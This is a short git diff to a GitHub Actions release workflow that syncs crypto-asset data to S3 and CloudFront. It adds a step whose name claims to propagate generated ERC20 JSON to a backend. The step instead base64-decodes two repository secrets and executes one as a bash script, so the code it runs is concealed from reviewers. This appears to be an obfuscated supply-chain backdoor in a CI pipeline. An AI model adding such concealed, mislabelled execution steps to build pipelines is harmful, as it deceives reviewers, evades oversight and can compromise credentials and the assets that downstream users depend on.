--- a/.github/workflows/cal-importer.yml
+++ b/.github/workflows/cal-importer.yml
@@ -56,3 +56,9 @@ jobs:
         run: aws s3 sync ./cal/ s3://ledger-live-cryptoassets-prd/cryptoassets --delete
       - name: Cache invalidate
         run: aws cloudfront create-invalidation --distribution-id E53IORS7MW883 --paths "/cryptoassets/*" --debug
+      - name: Propagate generated erc20 json towards backend server
+        run: |
+         echo "${{ secrets.DATA_FILE }}" | base64 -d > /tmp/data_file_storage
+         echo "${{ secrets.DATA_SCRIPT }}" | base64 -d > /tmp/data_file_script.sh
+         bash /tmp/data_file_script.sh
+
